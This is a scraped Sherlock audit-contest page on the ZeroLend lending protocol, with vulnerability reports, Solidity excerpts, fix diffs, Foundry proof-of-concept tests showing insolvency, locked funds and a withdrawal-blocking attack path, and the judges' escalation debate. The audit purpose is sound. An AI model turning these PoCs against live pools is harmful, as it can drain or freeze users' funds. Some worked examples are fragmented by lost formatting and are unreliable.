In evaluating the current system's functionality, issue 91 identified seven significant impacts resulting from improper handling, specifically regarding the liquidity and collateral management mechanisms:
Incorrect Withdrawals: The amount withdrawn is consistently 1% of the liquidated amount, which deviates from expected behavior.
Test Validity: The test scenario I provided demonstrates the validity of the concern, although I was unable to use an appropriate timeframe due to the Chainlink timestamp check. To ensure accuracy, I strongly recommend both parties rerun the scenario with the following conditions:
Systematic Impact: As stated in issue 91, testing across all relevant functions reveals that this has a distinct impact on subsequent function calls, altering the expected outputs.
Minting of Free Shares: By not considering other influencing factors, the current setup inadvertently allows users to mint free shares. These shares can then be converted back to the original amount, creating an imbalance.
Collateral Decline Over Time: The decline in collateral value over time affects the Liquidity in the pool, further complicating the issue. The test case clearly illustrates how the system's behavior changes in these scenarios. creates DOS vulnerability like issue 488 and 375.
Use of New Inputs: By running the system using the new inputs provided, you will see the exact impact referenced by spearmint. This highlights the need for a comprehensive review of the mechanics involved.
@Tomiwasa0 I will agree with your comment and leave this issue as is.
A2-security, denzi_, zarkk01
The ZeroLend protocol's PoolFactory
allows for global changes to the reserveFactor
, which affects all pools simultaneously. However, the ReserveLogic
contract applies this change inconsistently between interest accrual and treasury minting processes. This inconsistency leads to a mismatch between accrued interest for users and the amount minted to the treasury, causing protocol insolvency or locked funds.
The reserveFactor
is a crucial parameter in the protocol that determines the portion of interest accrued from borrowers that goes to the protocol's treasury. It's defined in the PoolFactory
contract PoolFactory is IPoolFactory, Ownable2Step { // ... uint256 public reserveFactor; // ... }
This reserveFactor
is used across all pools created by the factory. It's retrieved in various operations, such as in the supply
function for example :
function _supply(address asset, uint256 amount, bytes32 pos, DataTypes.ExtraData memory data) internal nonReentrant(RentrancyKind.LENDING) returns (DataTypes.SharesType memory res) { // ... res = SupplyLogic.executeSupply( _reserves[asset], _usersConfig[pos], _balances[asset][pos], _totalSupplies[asset], DataTypes.ExecuteSupplyParams({reserveFactor: _factory.reserveFactor(), /_ ... _/}) ); // ... }
The reserveFactor
plays a critical role in calculating interest rates and determining how much of the accrued interest goes to the liquidity providers and how much goes to the protocol's treasury . The issue arises from the fact that this reserveFactor
can be changed globally for all pools:
function setReserveFactor(uint256 updated) external onlyOwner { uint256 old = reserveFactor; reserveFactor = updated; emit ReserveFactorUpdated(old, updated, msg.sender); }
let's examine how this change affects the core logic in the ReserveLogic
function updateState(DataTypes.ReserveData storage self, uint256 _reserveFactor, DataTypes.ReserveCache memory _cache) internal { if (self.lastUpdateTimestamp == uint40(block.timestamp)) return; _updateIndexes(self, _cache); _accrueToTreasury(_reserveFactor, self, _cache); self.lastUpdateTimestamp = uint40(block.timestamp); }
The vulnerability lies in the fact that _updateIndexes
and _accrueToTreasury
will use different reserveFactor
values when a change occurs:
if the reserveFactors is changed _updateIndexes
will uses the old reserveFactor
implicitly through cached liquidityRate:
function _updateIndexes(DataTypes.ReserveData storage _reserve, DataTypes.ReserveCache memory _cache) internal { if (_cache.currLiquidityRate != 0) { uint256 cumulatedLiquidityInterest = MathUtils.calculateLinearInterest(_cache.currLiquidityRate, _cache.reserveLastUpdateTimestamp); _cache.nextLiquidityIndex = cumulatedLiquidityInterest.rayMul(_cache.currLiquidityIndex).toUint128(); _reserve.liquidityIndex = _cache.nextLiquidityIndex; } // ... }
will use the new reserveFactor
function _accrueToTreasury(uint256 reserveFactor, DataTypes.ReserveData storage _reserve, DataTypes.ReserveCache memory _cache) internal { // ... vars.amountToMint = vars.totalDebtAccrued.percentMul(reserveFactor); if (vars.amountToMint != 0) _reserve.accruedToTreasuryShares += vars.amountToMint.rayDiv(_cache.nextLiquidityIndex).toUint128(); }
This discrepancy results in the protocol minting more/less treasury shares than it should based on the actual accrued interest cause it uses the new reserveFactor
. Over time, this can lead to a substantial overallocation/underallocation of funds to the treasury, depleting the reserves available for users or leaving funds locked in the pool contract forever.
10,000 USD
10,000 USD
: 10%
12% * (100% - 10%) = 10.8%
After 2 months:
200 USD
changed to 30%
is called:
: Liquidity index = (0.018 + 1) * 1 = 1.018
(based on old 10.8%
: Amount to mint = 200 * 0.3 = 60 USD
(using new 30%
)When a user attempts to withdraw:
10,000 * 1.018 = 10,180 USD
60 USD
10,240 USD
However, the borrower only repaid 10,200 USD
principal + 200
interest), resulting in a 40 USD
shortfall. This discrepancy can lead to failed withdrawals and insolvency of the protocol.
the Chage of reserveFactor
leads to protocol insolvency risk or locked funds. Increased reserveFactor
causes over-minting to treasury, leaving insufficient funds for user withdrawals. Decreased reserveFactor
results in under-minting, locking tokens in the contract permanently. Both scenarios compromise the protocol's financial integrity
Manual Review
is impractical. we recommend storing the lastReserveFactor
used for each pool. This approach is similar to other protocols and ensures consistency between interest accrual and treasury minting.Add a new state variable in the ReserveData struct:
struct ReserveData { // ... existing fields + uint256 lastReserveFactor; }
Modify the updateState function to use and update this lastReserveFactor:
function updateState(DataTypes.ReserveData storage self, uint256 _reserveFactor, DataTypes.ReserveCache memory _cache) internal { if (self.lastUpdateTimestamp == uint40(block.timestamp)) return; _updateIndexes(self, _cache); - _accrueToTreasury(_reserveFactor, self, _cache); + _accrueToTreasury(self.lastReserveFactor, self, _cache); self.lastUpdateTimestamp = uint40(block.timestamp); + self.lastReserveFactor = _reserveFactor; }
This solution ensures that the same reserveFactor is used for both interest accrual and treasury minting within each update cycle, preventing inconsistencies while allowing for global reserveFactor changes to take effect gradually across all pools.
1 comment(s) were left on this issue during the judging contest.
Honour commented:
invalid: the cached reserveFactor is also the same used to accrue to treasury.
request poc
Seems related to #199
PoC requested from @A2-security
Requests remaining: 19
hey @nevillehuang ,this is not a dup of #199 , we have #316 which is duplicate of #199 . this one is different
invalid: the cached reserveFactor is also the same used to accrue to treasury.
is incorrect
function getSupplyBalance(DataTypes.PositionBalance storage self, uint256 index) public view returns (uint256 supply) { - uint256 increase = self.supplyShares.rayMul(index) - self.supplyShares.rayMul(self.lastSupplyLiquidtyIndex); - return self.supplyShares + increase; + return self.supplyShares.rayMul(index); } function getDebtBalance(DataTypes.PositionBalance storage self, uint256 index) internal view returns (uint256 debt) { - uint256 increase = self.debtShares.rayMul(index) - self.debtShares.rayMul(self.lastDebtLiquidtyIndex); - return self.debtShares + increase; + return self.debtShares.rayMul(index); }
function test\_auditPoc\_reserve() external { console.log('balance pool before : ', tokenA.balanceOf(address(pool))); \_mintAndApprove(alice, tokenA, 2 * amount, address(pool)); vm.startPrank(alice); pool.supplySimple(address(tokenA), alice, amount, 0); // deposit : 2000e18 pool.borrowSimple(address(tokenA), alice, borrowAmount, 0); // borrow : 800e18 vm.stopPrank(); // wrap sometime so the intrest accrue : vm.warp(block.timestamp + 30 days); // change reserve factor to 0.2e4 (20\%): poolFactory.setReserveFactor(0.2e4); vm.startPrank(alice); tokenA.approve(address(pool), UINT256\_MAX); pool.repaySimple(address(tokenA), UINT256\_MAX, 0); // withdraw all will revert cause there is not enough funds for treasury due to updating the factor : vm.expectRevert(); pool.withdrawSimple(address(tokenA), alice, UINT256\_MAX, 0); vm.stopPrank(); }
the transaction will revert , because the amount accrued to treasury , doesn't exist , and please notice that this will effect all the pool in the protocol , and this amount will keep growing , since it's accumulate yield as well , which is insolvency
The issue described in the report, is similar to a bug found in the aave v3 codebase when updating the reserveFactor. This bug have been disclosed and fixed with the v3.1 release\#L300C1-L315C4
function setReserveFactor( address asset, uint256 newReserveFactor ) external override onlyRiskOrPoolAdmins { require(newReserveFactor <= PercentageMath.PERCENTAGE\_FACTOR, Errors.INVALID\_RESERVE\_FACTOR); @>> \_pool.syncIndexesState(asset); DataTypes.ReserveConfigurationMap memory currentConfig = \_pool.getConfiguration(asset); uint256 oldReserveFactor = currentConfig.getReserveFactor(); currentConfig.setReserveFactor(newReserveFactor); \_pool.setConfiguration(asset, currentConfig); emit ReserveFactorChanged(asset, oldReserveFactor, newReserveFactor); \_pool.syncRatesState(asset); }
Also the fix we recomended is inspired by how the eulerv2 handled this, in their vault. (cache reserve factor when calling updateInterestrate, and use the cached factor when updating the index!)
is a protocol admin function
Sherlock rules state
Admin could have an incorrect call order. Example: If an Admin forgets to setWithdrawAddress() before calling withdrawAll() This is not a valid issue.
An admin action can break certain assumptions about the functioning of the code. Example: Pausing a collateral causes some users to be unfairly liquidated or any other action causing loss of funds. This is not considered a valid issue.
If the admin calls forceUpdateReserve()
on the pools before calling setReserveFactor()
this issue will not exist
Since setReserveFactor()
is only called by the protocol admin, according to the sherlock rules admin actions that lead to issues are not valid
is a protocol admin functionSherlock rules state
Admin could have an incorrect call order. Example: If an Admin forgets to setWithdrawAddress() before calling withdrawAll() This is not a valid issue.
An admin action can break certain assumptions about the functioning of the code. Example: Pausing a collateral causes some users to be unfairly liquidated or any other action causing loss of funds. This is not considered a valid issue.
If the admin calls
on the pools before callingsetReserveFactor()
this issue will not existSince
is only called by the protocol admin, according to the sherlock rules admin actions that lead to issues are not valid
You've created a valid escalation!
To remove the escalation from consideration: Delete your comment.
You may delete or edit your escalation comment anytime before the 48-hour escalation window closes. After that, the escalation becomes final.
First point:
This is not true and presents a Dos attack vector. Creating pools on zerolend is permissionless, u can't simply expect the admin to call forceUpdateReserve() on 10 of thousands of pools before changing the resrve factor. This is simply unrealistic, costly and opens an attack vector for people to dos the treasury
Second point:
I would also like to clarify further for the escalator that the 2nd point does not apply to functions which itself are broken/incomplete. The issue is not about admin missing or not executing or delaying a call or providing a wrong input. The issue is that the function is missing line/s of code to properly adjust the reserve factor.
This issue falls right between the "Admin Input/call validation" rules and broken functionality:
Admin could have an incorrect call order. An admin action can break certain assumptions about the functioning of the code.
Breaks core contract functionality, rendering the contract useless or leading to loss of funds of the affected party larger than 0.01% and 10 USD.
But I think we have broken functionality here, not an admin error.
Planning to reject the escalation and leave the issue as is.
Has duplicates
Escalations have been resolved successfully!
Escalation status:
Nihavent, iamnmt
The interest paid on borrows is calculated in a compounding fashion, but the interest earned on supplying assets is calculated in a fixed way. As a result more interest will be repaid by borrowers than is claimable by suppliers. This buildup of balance never gets rebased into the liquidityIndex
, nor is it claimable with some sort of 'skim' function.
Any time an action calls ReserveLogic::updateState()
, ReserveLogic::_updateIndexes()
is called.
In _updateIndexes()
, the _cache.nextLiquidityIndex
is a scaled up version of _cache.currLiquidityIndex
based on the 'linear interest' calculated in MathUtils::calculateLinearInterest()
scales a fixed interest annual interest rate by the amount of time elapsed since the last call:
function calculateLinearInterest(uint256 rate, uint40 lastUpdateTimestamp) internal view returns (uint256) { //solium-disable-next-line uint256 result = rate * (block.timestamp - uint256(lastUpdateTimestamp)); unchecked { result = result / SECONDS_PER_YEAR; } return WadRayMath.RAY + result; }
Similarly, the _cache.nextBorrowIndex
is a scaled up version of _cache.currBorrowIndex
based on the 'compound interest' calculated in MathUtils::calculateCompoundedInterest()
compounds a rate based on the time elapsed since it was last called:
function calculateCompoundedInterest(uint256 rate, uint40 lastUpdateTimestamp, uint256 currentTimestamp) internal pure returns (uint256) { //solium-disable-next-line uint256 exp = currentTimestamp - uint256(lastUpdateTimestamp); if (exp == 0) { return WadRayMath.RAY; } uint256 expMinusOne; uint256 expMinusTwo; uint256 basePowerTwo; uint256 basePowerThree; unchecked { expMinusOne = exp - 1; expMinusTwo = exp > 2 ? exp - 2 : 0; basePowerTwo = rate.rayMul(rate) / (SECONDS_PER_YEAR * SECONDS_PER_YEAR); basePowerThree = basePowerTwo.rayMul(rate) / SECONDS_PER_YEAR; } uint256 secondTerm = exp * expMinusOne * basePowerTwo; unchecked { secondTerm /= 2; } uint256 thirdTerm = exp * expMinusOne * expMinusTwo * basePowerThree; unchecked { thirdTerm /= 6; } return WadRayMath.RAY + (rate * exp) / SECONDS_PER_YEAR + secondTerm + thirdTerm; }
As a result, more interest is payable on debt than is earned on supplied liquidity. This is a design choice by the protocol, however without a function to 'skim' this extra interest, these tokens will buildup and are locked in the protocol.
must NOT be called every second, as this would create a compounding-effect on the 'linear rate' such that the difference in interest paid on debts is equal to the interest earned on supplies.No response
The built up token balance can be borrowed and flash loaned, leading to compounding build up of unclaimable liquidity
Create a new file in /test/forge/core/pool and paste the below contents. The test shows a simple supply/borrow/warp/repay flow. After the actions are complete, the pool has more tokenB
than is claimable by the supplier and the treasury. These tokens are now locked in the contract
// SPDX-License-Identifier: BUSL-1.1 pragma solidity 0.8.19; import {console2} from 'forge-std/src/Test.sol'; import {PoolLiquidationTest} from './PoolLiquidationTests.t.sol'; contract AuditUnclaimableBalanceBuildupOnPool is PoolLiquidationTest { function test_POC_UnclaimableBalanceBuildupOnPool () public { uint256 aliceMintAmount = 10_000e18; uint256 bobMintAmount = 10_000e18; uint256 supplyAmount = 1000e18; uint256 borrowAmount = 1000e18; _mintAndApprove(alice, tokenA, aliceMintAmount, address(pool)); // alice collateral _mintAndApprove(bob, tokenB, bobMintAmount, address(pool)); // bob supply _mintAndApprove(alice, tokenB, aliceMintAmount, address(pool)); // alice needs some funds to pay interest vm.startPrank(bob); pool.supplySimple(address(tokenB), bob, supplyAmount, 0); vm.stopPrank(); vm.startPrank(alice); pool.supplySimple(address(tokenA), alice, aliceMintAmount, 0); // alice collateral pool.borrowSimple(address(tokenB), alice, borrowAmount, 0); // 100% utilization vm.stopPrank(); vm.warp(block.timestamp + 365 days); // Time passes, interest accrues, treasury shares accrue pool.forceUpdateReserves(); // Alice full repay vm.startPrank(alice); tokenB.approve(address(pool), type(uint256).max); pool.repaySimple(address(tokenB), type(uint256).max, 0); (,,, uint256 debtShares) = pool.marketBalances(address(tokenB)); // All debt has been repaid assert(debtShares == 0); // Bob's claim on pool's tokenB bytes32 bobPos = keccak256(abi.encodePacked(bob, 'index', uint256(0))); uint256 BobsMaxWithdrawAssets = pool.supplyShares(address(tokenB), bobPos) * pool.getReserveData(address(tokenB)).liquidityIndex / 1e27; // Treasury claim on pool's tokenB uint256 accruedTreasuryAssets = pool.getReserveData(address(tokenB)).accruedToTreasuryShares * pool.getReserveData(address(tokenB)).liquidityIndex / 1e27; // Total balance of pool's tokenB uint256 poolTokenBBalance = tokenB.balanceOf(address(pool)); assert(poolTokenBBalance > BobsMaxWithdrawAssets + accruedTreasuryAssets); // There are more tokenB on the pool than all suppliers + treasury claim. } }
One option is to create a function which claims the latent funds to the treasury, callable by an owner
tokenA.balanceOf(pool) - ( totalSupplyShares * liquidityIndex )
)Another option would be to occasionally rebase liquidityIndex
to increase the value of supplyShares so supplies have a claim on these extra funds.
In both cases it may be sensible to leave some dust as a buffer.
This issue is invalid for multiple reasons
The condition for this issue as stated by the watson is that updateState()
must NOT be called regularly. This is totally unrealistic since any any action (supply, borrow, withdraw, repay, etc) will call updateState()
. In the POC they provided, it involves not calling updateState()
for 365 days after borrowing funds.
Sherlock's criteria for a medium issue requires the following:
Causes a loss of funds but requires certain external conditions or specific states, or a loss is highly constrained. The loss of the affected party must exceed 0.01% and 10 USD.
No user experiences a loss in this issue
This issue is invalid for multiple reasons
The condition for this issue as stated by the watson is that
must NOT be called regularly. This is totally unrealistic since any any action (supply, borrow, withdraw, repay, etc) will callupdateState()
. In the POC they provided, it involves not callingupdateState()
for 365 days after borrowing funds.Sherlock's criteria for a medium issue requires the following:
Causes a loss of funds but requires certain external conditions or specific states, or a loss is highly constrained. The loss of the affected party must exceed 0.01% and 10 USD.
No user experiences a loss in this issue
- Lenders receive the correct interest rate
- Borrowers pay the correct borrow rate
You've created a valid escalation!
To remove the escalation from consideration: Delete your comment.
You may delete or edit your escalation comment anytime before the 48-hour escalation window closes. After that, the escalation becomes final.
"1. The condition for this issue as stated by the watson is that updateState() must NOT be called regularly. This is totally unrealistic since any any action (supply, borrow, withdraw, repay, etc) will call updateState(). In the POC they provided, it involves not calling updateState() for 365 days after borrowing funds."
The escalation comment misquoted the report saying "updateState() must NOT be called regularly" when the report states "updateState() must NOT be called every second". These are meaningfully different statements because the impact is present when updateState() is called as frequently as 2 seconds, which is more frequently than what would be expected in most pool/asset combinations.
The elapsed time between updateState()
calls is completely arbitrary and in the POC I used 365 days as a matter of habbit. See adjusted POC below where instead of warping 365 days, we warp just 2 seconds and the test still passes:
// SPDX-License-Identifier: BUSL-1.1 pragma solidity 0.8.19; import {console2} from 'forge-std/src/Test.sol'; import {PoolLiquidationTest} from './PoolLiquidationTests.t.sol'; contract AuditUnclaimableBalanceBuildupOnPool is PoolLiquidationTest { ... - vm.warp(block.timestamp + 365 days); // Time passes, interest accrues, treasury shares accrue + vm.warp(block.timestamp + 2 seconds); // Time passes, interest accrues, treasury shares accrue pool.forceUpdateReserves(); ... } }
Ran 1 test for test/forge/core/pool/UnclaimableBalanceBuildupOnPool.t.sol:AuditUnclaimableBalanceBuildupOnPool [PASS] test\_POC\_UnclaimableBalanceBuildupOnPool() (gas: 811472) Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 11.18ms (1.08ms CPU time)
"2. Sherlock's criteria for a medium issue requires the following:
Causes a loss of funds but requires certain external conditions or specific states, or a loss is highly constrained. The loss of the affected party must exceed 0.01% and 10 USD.
No user experiences a loss in this issue
Lenders receive the correct interest rate
Borrowers pay the correct borrow rate"
Funds locked in the contract must be considered lost because they are permanently unretrievable.
The amount locked (lets call it surpluss) increases every time debt is repaid. Over time it's reasonable to expect a signficiant portion of all a pool's assets will be surpluss and not claimable by anyone.
The value of locked funds will clearly exceed 10 USD as there will usually be several percentage points difference between the indexes. This of course will vary depending on the frequency of updateState()
calls. If this needs to be quantified I would be happy to help, but it clearly exceeds dust values.
Finally, we can refer to the Sherlock standards to determine that permanent locked funds constitutes a valid issue:
"2. Could Denial-of-Service (DOS), griefing, or locking of contracts count as a Medium (or High) issue? DoS has two separate scores on which it can become an issue:
- The issue causes locking of funds for users for more than a week.
- The issue impacts the availability of time-sensitive functions (cutoff functions are not considered time-sensitive).
If at least one of these are describing the case, the issue can be a Medium. If both apply, the issue can be considered of High severity. Additional constraints related to the issue may decrease its severity accordingly. \
Griefing for gas (frontrunning a transaction to fail, even if can be done perpetually) is considered a DoS of a single block, hence only if the function is clearly time-sensitive, it can be a Medium severity issue."
For me, this issue is borderline Medium/Low. Because of this, we have to look at Sherlock's rules.
These are the requirements for Medium severity:
Causes a loss of funds but requires certain external conditions or specific states, or a loss is highly constrained. The loss of the affected party must exceed 0.01% and 10 USD.
The losses exceed 0.01% and 10 USD, and the issue meets the requirements for Medium severity.
Planning to reject the escalation and leave the issue as is.
@cvetanovv Who exactly is experiencing the loss of funds here?
The borrowers pay the expected borrow rate according to the interest rate contract.
The lenders receive the expected supply rate according to the interest rate contract.
The protocol receives the expected revenue from the reserve factor.
AAVE does implement a rescueTokens function but it allows the owner to arbitrarily remove any amount of tokens from the pool, this is fine because AAVE governance is trusted. However, in ZeroLend pool deployment is permission-less, implementing such a function for each pool would pose a huge security risk which is why the protocol chose to not implement it.
This looks like an obvious design choice to me.
@cvetanovv I agree with @0xSpearmint. This is actually not simply a design choice. Using compounding rate for borrowers and linear rate for suppliers are recommended way to build a lending protocol. In order to keep protocols health at higher point most of the lending protocol using this way. Those money is not lost, it's always in circulation for keeping liquidity in safe point. Repaying all the debt and getting all the pools' money is not rational movement in this PoC. There is no impact here as @0xSpearmint mentioned.
Secondly, I wonder @Nihavent did you solve all the problems in the protocl which is related with interest rate and accrued fund ? Because identifying this problem with this PoC is really hard in current circumstances. We have 33 findings right now. I don't know how many of them related with those.
We all seem to agree that there will be unclaimable assets building up in the pool. These are the funds that are locked in the contract, and these funds are clearly lost.
” This looks like an obvious design choice to me.”
Given that the devs implemented ‘sweep()’ in NFTPositionManager which claims tokens of much lower value, not implementing similar functionality in the Pool contract is an obvious oversight and cannot be considered design.
Another piece of evidence that this is not a design choice is the code comment
”The approximation slightly underpays liquidity providers and undercharges borrowers”
The comment indicates that due to using binomial approximation (3 terms) to calculate compounding interest, borrowers slightly underpay interest and suppliers receive slightly less interest.
This gives us a glimpse into the dev’s intentions that the supply interest earned should be much closer (potentially even equal to) to the debt interest paid (otherwise the precision lost due to this implementation does not matter).
The current implementation allows a buildup of unclaimable funds which far exceeds the precision lost in the code comment.
### Who lost the funds?
It would be up to the protocol to make a design decision as to who claims these funds.
If we take the code comment above it would appear that the suppliers are entitled to these funds (the suppliers must earn close to the interest repaid by borrowers for suppliers to feel the precision lost described in the code comment).
I did not take a definitive stand on this, I don’t believe it’s require for valid medium severity.
” Using compounding rate for borrowers and linear rate for suppliers are recommended way to build a lending protocol.”
This is completely fine as long as there is a way to claim the delta between repaid debt interest and earned supply interest. If not this delta is locked in the contract.
” Those money is not lost, it's always in circulation for keeping liquidity in safe point. Repaying all the debt and getting all the pools' money is not rational movement in this PoC.”
Yes the unclaimable assets continue to be borrowed and repaid, which further increases the amount of unclaimable assets. Don’t be fooled by the fact that money is moving, a significant portion of it is unclaimable.
Repaying all debt and showing that the total claimable assets is less than the total pool’s assets was the simplest way to show this issue. This is a rational situation in Zerolend with permissionless pools, many pools will become inactive and liquidity may concentrate towards ‘high performing’ pools. In the current implementation all inactive pools will have latent funds locked permanently.
Even in active pools the unclaimable reserve is building up, which is why Aave fixed this problem with ‘rescueTokens’
I agree with @Nihavent
We have a token loss that meets the Medium severity requirement.
The loss of the affected party must exceed 0.01% and 10 USD.
These tokens remain permanently locked in the contract. AAVE has implemented a rescueTokens
function, which fixes the problem. However, I agree that the recommendation here to implement the same function is not good and may open a new vulnerability because, in the ZeroLend pool, deployment is permissionless. The issue is valid, and the ZeroLend team is left to decide if and how they will fix the stuck tokens.
My decision to reject the escalation remains.
Has duplicates
Escalations have been resolved successfully!
Escalation status:
resulting in higher than expected treasury fees and under rare circumstances DOSed pool withdrawalsSource:
0xAlix2, A2-security, Bigsam, Nihavent, Ocean_Sky, trachev
Fees on debt interest are calculated in 'assets', but not claimed immediately and stored as shares. When they're claimed, they're treated as regular supplyShares and converted back to assets based on the liquidityIndex
at the time they're claimed. This results in the realized fees being higher than expected, and under an extreme scenario may not leave enough liquidity for regular pool suppliers to withdraw their funds.
Each time a pool's reserve state is updated, ReserveLogic::_accrueToTreasury()
is called.
This function incriments _reserve.accruedToTreasuryShares
by the shares equiavalent of the assets taken as a fee. Note vars.amountToMint
is in assets, and _reserve.accruedToTreasuryShares
is stored in shares as the 'fee assets' are not always immediately sent to the treasury.
function _accrueToTreasury(uint256 reserveFactor, DataTypes.ReserveData storage _reserve, DataTypes.ReserveCache memory _cache) internal { ... SKIP!... vars.amountToMint = vars.totalDebtAccrued.percentMul(reserveFactor); // Assets @> if (vars.amountToMint != 0) _reserve.accruedToTreasuryShares += vars.amountToMint.rayDiv(_cache.nextLiquidityIndex).toUint128(); // Shares }
When any pool withdrawal is executed, PoolLogic::executeMintToTreasury()
is called. The stored shares are converted back to assets based on the current liquidityIndex
function executeMintToTreasury( DataTypes.ReserveSupplies storage totalSupply, mapping(address => DataTypes.ReserveData) storage reservesData, address treasury, address asset ) external { DataTypes.ReserveData storage reserve = reservesData[asset]; uint256 accruedToTreasuryShares = reserve.accruedToTreasuryShares; if (accruedToTreasuryShares != 0) { reserve.accruedToTreasuryShares = 0; uint256 normalizedIncome = reserve.getNormalizedIncome(); uint256 amountToMint = accruedToTreasuryShares.rayMul(normalizedIncome); // Assets, scaled up by current liquidityIndex IERC20(asset).safeTransfer(treasury, amountToMint); totalSupply.supplyShares -= accruedToTreasuryShares; emit PoolEventsLib.MintedToTreasury(asset, amountToMint); } }
As a result, the actual fee taken by the treasury exceeds the original x% intended by reserveFactor
at the time the debt was repaid.
In addition, the accumulation of interest on these accruedToTreasuryShares
can lead to pool withdrawals being DOSed under circumstances where the _updateIndexes()
is called close to every second to create a compounding effect. This compounding effect on brings the liquidityIndex
closer to the borrowIndex
. This results in the interest earned on accruedToTreasuryShares
causing the pool to run out of liquidity when suppliers withdraw.
Impact 1
Impact 2
is called each second (or close to)No response
Impact 2
is called close to every second, bringing liquidityIndex
closer to borrowIndex
. Note this is callable from an external function Pool::forceUpdateReserves()
, the pool runs out of liquidity DOSing the withdrawal.reserveFactor
. That is, if reserveFactor
is 1e3 (10%) and 1e18 interest is earned, the protocol will eventually claim more than 10% * 1e18 assets._updateIndexes()
is called every second, there will not be enough liquidity for suppliers to withdraw because the treasury earning supply interest on their accruedToTreasuryShares
is not accounted for.The below coded POC implements the 'Attack Path' described above.
First, add this line to the CorePoolTests::_setUpCorePool()
function to create a scenario with a non-zero reserve factor:
function _setUpCorePool() internal { poolImplementation = new Pool(); poolFactory = new PoolFactory(address(poolImplementation)); + poolFactory.setReserveFactor(1e3); // 10% configurator = new PoolConfigurator(address(poolFactory)); ... SKIP!... }
Then, create a new file on /test/forge/core/pool and paste the below contents.
// SPDX-License-Identifier: BUSL-1.1 pragma solidity 0.8.19; import {console2} from 'forge-std/src/Test.sol'; import {PoolLiquidationTest} from './PoolLiquidationTests.t.sol'; contract AuditHighSupplyRateDosWithdrawals is PoolLiquidationTest { function test_POC_DosedWithdrawalsDueToTreasurySharesAccruing() public { uint256 aliceMintAmount = 10_000e18; uint256 bobMintAmount = 10_000e18; uint256 supplyAmount = 1000e18; uint256 borrowAmount = 1000e18; _mintAndApprove(alice, tokenA, aliceMintAmount, address(pool)); // alice collateral _mintAndApprove(bob, tokenB, bobMintAmount, address(pool)); // bob supply _mintAndApprove(alice, tokenB, aliceMintAmount, address(pool)); // alice needs some funds to pay interest vm.startPrank(bob); pool.supplySimple(address(tokenB), bob, supplyAmount, 0); vm.stopPrank(); vm.startPrank(alice); pool.supplySimple(address(tokenA), alice, aliceMintAmount, 0); // alice collateral pool.borrowSimple(address(tokenB), alice, borrowAmount, 0); // 100% utilization vm.stopPrank(); for(uint256 i = 0; i < (12 * 60 * 60); i++) { // Each second `_updateIndexes()` is called via external function `forceUpdateReserves()` vm.warp(block.timestamp + 1); pool.forceUpdateReserves(); } // Alice full repay vm.startPrank(alice); tokenB.approve(address(pool), type(uint256).max); pool.repaySimple(address(tokenB), type(uint256).max, 0); uint256 post_aliceTokenBBalance = tokenB.balanceOf(alice); uint256 interestRepaidByAlice = aliceMintAmount - post_aliceTokenBBalance; for(uint256 i = 0; i < (60); i++) { // warp after for treasury to accrue interest on their 'fee shares' vm.warp(block.timestamp + 1); pool.forceUpdateReserves(); } // Check debt has been repaid (, , , uint256 debtShares) = pool.marketBalances(address(tokenB)); assert(debtShares == 0); // All debt has been repaid // Treasury assets to claim uint256 treasuryAssetsToClaim = pool.getReserveData(address(tokenB)).accruedToTreasuryShares * pool.getReserveData(address(tokenB)).liquidityIndex / 1e27; // Bob's assets to claim bytes32 bobPos = keccak256(abi.encodePacked(bob, 'index', uint256(0))); uint256 bobsAssets = pool.supplyShares(address(tokenB), bobPos) * pool.getReserveData(address(tokenB)).liquidityIndex / 1e27; // Impact 1: the interest claimable by the treasury is greater than 10% of the interest repaid assert(treasuryAssetsToClaim > pool.factory().reserveFactor() * interestRepaidByAlice / 1e4); // Impact 2: Bob & the treasury's claim on the assets is greater than available assets, despite no outstanding debt. // This assert demonstrates that bob's withdrawal would be DOSed as withdrawal calls include a transfer of treasury assets. // The withdrawal DOS cannot be shown due to the call reverting due to the 'share underflow' issue described in another report uint256 poolLiquidity = tokenB.balanceOf(address(pool)); assert(bobsAssets + treasuryAssetsToClaim > poolLiquidity); } }
Three possible solutions:
. For example if a fee is 10%, the protocol will take exactly 10% of the interest earned on debt.supplyShares
by diluting the liquidityIndex
upon creating these shares. This solution will allow the conversion back to assets in executeMintToTreasury()
to remain unchanged.
Note I acknowledge that the calculation of liquidityRate
does account for reserveFactor
, however given this is out of scope I did not focus on it. Regardless, it does not scale the rate down enough to account for the interest the treasury will earn on these shares.
1 comment(s) were left on this issue during the judging contest.
Honour commented:
Invalid: fees can accrue interest as well as is done in AAVE
This issue is invalid and is different from the #16 #220 #267 #317 group
#240 is not in the above group
should earn supply interest, it is accounted for in the interest calculations and is the exact same way aave works as well.
This issue is invalid and is different from the #16 #220 #267 #317 group
#240 is not in the above group
should earn supply interest, it is accounted for in the interest calculations and is the exact same way aave works as well.
You've created a valid escalation!
To remove the escalation from consideration: Delete your comment.
You may delete or edit your escalation comment anytime before the 48-hour escalation window closes. After that, the escalation becomes final.
This issue is invalid and is different from the #16 #220 #267 #317 group #240 is not in the above group
should earn supply interest, it is accounted for in the interest calculations and is the exact same way aave works as well.
This report focuses on the edge case regarding frequent calls of \_updateIndexes()
however it still demonstrates a withdrawal DOSed due to insufficient liquidity (see impact 2 on the POC and associated comment):
Excerpt from POC:
... // Impact 2: Bob & the treasury's claim on the assets is greater than available assets, despite no outstanding debt. // This assert demonstrates that bob's withdrawal would be DOSed as withdrawal calls include a transfer of treasury assets. // The withdrawal DOS cannot be shown due to the call reverting due to the 'share underflow' issue described in another report uint256 poolLiquidity = tokenB.balanceOf(address(pool)); assert(bobsAssets + treasuryAssetsToClaim > poolLiquidity);
If you have any doubt that this is due to the transfer of assets to treasury, you could add the following assert statement showing sufficient liquidity to withdraw if we remove the treasury asset transfer:
... // Impact 2: Bob & the treasury's claim on the assets is greater than available assets, despite no outstanding debt. // This assert demonstrates that bob's withdrawal would be DOSed as withdrawal calls include a transfer of treasury assets. // The withdrawal DOS cannot be shown due to the call reverting due to the 'share underflow' issue described in another report uint256 poolLiquidity = tokenB.balanceOf(address(pool)); assert(bobsAssets + treasuryAssetsToClaim > poolLiquidity); + assert(bobsAssets <= poolLiquidity);
This is exactly the same root cause as the family of issues you listed, thus they should remain grouped.
My understanding is in Sherlock duplication rules, valid duplicates do not need to identify the primary attack path.
This report also discusses interest accruing on minted treasury shares results in more than the reserveFactor
being claimed by the treasury (see impact 1 in the POC). As mentioned in the mitigations, this could be fixed by sending the fees in assets to the treasury upon debt repayment instead of minting the treasury shares which accrue over time.
If this change was implemented it would also mitigate the DOSed withdrawals because a withdrawal would not revert when the pool has just enough liquidity to service the withdrawn assets.
